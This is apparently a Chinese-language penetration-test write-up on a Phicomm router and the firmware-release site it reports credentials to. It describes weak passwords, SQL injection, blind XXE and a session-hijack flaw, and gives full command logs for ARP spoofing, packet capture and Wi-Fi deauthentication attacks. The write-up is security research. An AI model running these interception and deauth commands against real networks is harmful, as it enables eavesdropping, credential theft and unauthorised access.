0×00 固件发布站弱口令+sql注入

fir302b的板子还是比较友好的,拆开能直接看到GND TX RX VCC,虽然没有针脚。
我手头只有一块ttl开发板和三根杜邦线,直接连上UART:

对某路由器进行的渗透测试-RadeBit瑞安全

自检结束后,能看到两处post请求,把当前的设备指纹信息、终端账号密码、云账号密码发送到了一个地址

对某路由器进行的渗透测试-RadeBit瑞安全

这个url是一个固件发布站,后台存在弱口令

对某路由器进行的渗透测试-RadeBit瑞安全

在查询工号处存在注入

对某路由器进行的渗透测试-RadeBit瑞安全

昨天测试的时候,发现还有个spring框架的任意文件读取漏洞,今天已经修了

0×01 固件发布站SOAP-based blind xxe

抓路由器的数据包看一下完整的请求

root@kali:~# nmap -T4 -O 10.8.5.* -vv
Nmap scan report for 10.8.5.232
Host is up, received arp-response (-0.076s latency).
All 1000 scanned ports on 10.8.5.232 are filtered because of 1000 no-responses
MAC Address: F0:EB:D0:54:43:E6 (Shanghai Feixun Communication Co.)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=6.49BETA4%E=4%D=11/14%OT=%CT=%CU=%PV=Y%DS=1%DC=D%G=N%M=F0EBD0%TM=58295455%P=x86_64-pc-linux-gnu)
SEQ(II=I)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)

root@kali:~# traceroute baidu.com
traceroute to baidu.com (111.13.101.208), 30 hops max, 60 byte packets
 1  10.8.5.1 (10.8.5.1)  10.091 ms  10.522 ms  10.715 ms
root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
root@kali:~# arpspoof -i eth0 -t 10.8.5.1 10.8.5.232
...
root@kali:~# arpspoof -i eth0 -t 10.8.5.232 10.8.5.1
...
root@kali:~# tcpdump -i eth0 -w victim.pcap -vv
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
^C905 packets captured
905 packets received by filter
0 packets dropped by kernel

这里是因为用的交换机,直接混杂模式抓不到包

那么扫上层网段得到路由器IP,然后找到网关,双向欺骗后,重启路由器,tcpdump抓包,等待路由器自检结束

对某路由器进行的渗透测试-RadeBit瑞安全

wireshark过滤http请求得到完整数据包

发现能自定义DTD,能加载外部实体:

对某路由器进行的渗透测试-RadeBit瑞安全

那么 读一下/var/log/messages

对某路由器进行的渗透测试-RadeBit瑞安全

0×02 认证会话劫持漏洞

说起来这算是为了防御arp嗅探泄露cookie而产生的一种漏洞
简单的测试了一下,deauth中断client连接后,session没有立即失效,伪造client mac地址即可进入路由器

对某路由器进行的渗透测试-RadeBit瑞安全
root@kali:~# airmon-ng check kill

Killing these processes:

  PID Name
 1222 wpa_supplicant

root@kali:~# ifconfig 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:12 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:720 (720.0 B)  TX bytes:720 (720.0 B)

root@kali:~# airmon-ng start wlan0


PHY    Interface    Driver        Chipset

phy0    wlan0        iwlwifi        Intel Corporation Centrino Ultimate-N 6300 (rev 3e)

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# airodump-ng wlan0mon -w picTemp/wifi.csv
 CH  1 ][ Elapsed: 12 s ][ 2016-11-03 14:37

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 F0:EB:D0:54:43:E7  -18        9        2    0  11  54e  WPA2 CCMP   PSK  PHICOMM_5443E7                                                             
 3C:8C:40:49:3D:90  -29        3        3    0   1  54e. OPN              mxxz-chinaunicom                                                           
 B0:68:B6:F8:A6:18  -30       14        0    0   8  54e. WPA2 CCMP   PSK  moresecret                                                                 
 D4:EE:07:2B:BE:02  -48       24        3    0   9  54e  WPA2 CCMP   PSK  moresec                                                                    
 22:C0:90:A8:12:83  -45       23        0    0   6  54e. WPA2 CCMP   PSK  LieBaoWiFi355

root@kali:~# airodump-ng wlan0mon --bssid F0:EB:D0:54:43:E7 -c 11
CH  7 ][ Elapsed: 36 s ][ 2016-11-03 14:48                                                                                                                                                                                              
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                  
 F0:EB:D0:54:43:E7  -19       26        3    0  11  54e  WPA2 CCMP   PSK  PHICOMM_5443E7  

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                                                                                                                                
 F0:EB:D0:54:43:E7  30:F7:72:41:91:2B  -38    0 - 1     23       15   

root@kali:~# aireplay-ng -0 0 -a F0:EB:D0:54:43:E7 -c 30:F7:72:41:91:2B wlan0mon
15:04:05  Waiting for beacon frame (BSSID: F0:EB:D0:54:43:E7) on channel 11
15:04:06  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [13|60 ACKs]
15:04:06  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [25|48 ACKs]
15:04:07  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [ 0| 0 ACKs]
15:04:07  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [54| 7 ACKs]
15:04:08  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [56| 0 ACKs]
15:04:09  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [55| 0 ACKs]
对某路由器进行的渗透测试-RadeBit瑞安全

几乎是全站静态,密码base64后硬编码在页面中

对某路由器进行的渗透测试-RadeBit瑞安全